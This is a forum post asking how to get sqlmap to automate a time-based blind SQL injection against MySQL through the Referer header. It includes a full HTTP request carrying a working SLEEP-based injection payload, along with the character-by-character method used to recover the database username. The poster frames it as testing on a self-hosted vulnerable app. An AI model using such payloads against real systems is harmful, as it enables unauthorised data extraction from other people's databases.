Results 1 to 1 of 1

Thread: sqlmap - SQLi (time-based blind) (MySQL)

  1. #1
    Just burned their ISO
    Join Date
    Jan 2010

    Default sqlmap - SQLi (time-based blind) (MySQL)

    In my situation, my vulnerable parameter is Referer in the HTTP headers. I am able to enumerate the username and database name manually, but can someone explain or point me to an article that gives details about sqlmap and time-based with mysql? Here is an example of how I was able to enumerate the name. I'm unsure if there's any "custom" way of getting sqlmap work with this.

    GET /vulnwebapp/index.php?id=2 HTTP/1.1
    Proxy-Connection: keep-alive
    User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Referer: '+IF(SUBSTRING(USER(),1,1)='r',SLEEP(5),1)+'
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
    FYI, I'm testing this on a vulnerable web app hosted by myself. So with the above request, the page sleeps because the first character of the current username is "r", which eventually allows me to change 1,1 to 2,1 and so forth until I figure out that the username is "root."

    Is there any way to get sqlmap to assist with this type of attack?
    Last edited by altjx; 10-07-2012 at 03:41 PM.

Similar Threads

  1. SQLi - MySQL
    By lewlsaucengravy in forum BackTrack 5 General Topics
    Replies: 3
    Last Post: 10-09-2012, 07:16 PM
  2. Sql injection blind
    By PushorPop in forum Angolo dei Newbie
    Replies: 1
    Last Post: 03-16-2011, 05:43 PM
  3. Pycurl : libcurl link-time version is older than compile-time version
    By williamc in forum OLD BT3beta Software related issues
    Replies: 3
    Last Post: 04-07-2008, 10:58 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts